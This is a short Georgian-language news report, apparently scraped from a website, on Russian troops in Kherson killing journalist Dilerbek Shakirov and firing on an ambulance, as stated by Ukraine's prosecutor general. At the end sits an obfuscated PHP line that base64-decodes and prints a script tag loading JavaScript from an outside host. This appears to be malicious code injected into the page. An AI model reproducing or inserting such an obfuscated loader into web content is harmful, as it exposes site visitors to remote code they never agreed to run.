celsiusi
ავერსი შნაიდერი
ხერსონაში რუსმა სამხედროებმა საინფორმაციო ყოველკვირეული გამოცემის თანამშრომელი, სამოქალაქო ჟურნალისტი მოკლეს. ამის შესახებ „ფეისბუქში“ გენერალური პროკურორი ირინა ვენედიქტოვა წერს.
 
მისი ინფორმაციით, სოფელ ზელენოვკაში ავტომობილიდან დაცხრილეს ჟურნალისტი დილერბეკ შაკიროვი, რომელიც ამავდროულად საქველმოქმედო ფონდის წარმომადგენელიც იყო. ვენედიქტოვას ინფორმაციით, დღესვე რუსმა ოკუპანტებმა ხერსონის ოლქში ცეცხლი გაუხსნეს სასწრაფო დახმარების მანქანას, რომელსაც დაჭრილი მამაკაცი გადაყავდა.
 
გენპროკურორის ინფორმაციით, სასწრაფოს მძღოლი და დაჭრილი მამაკაცი დაიწვნენ, კიდევ ერთი ადამიანი დაიჭრა. ვენედიქტოვას თქმით, მომხდარ ფაქტებზე სისხლის სამართლის საქმე აღიძრა.
689
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");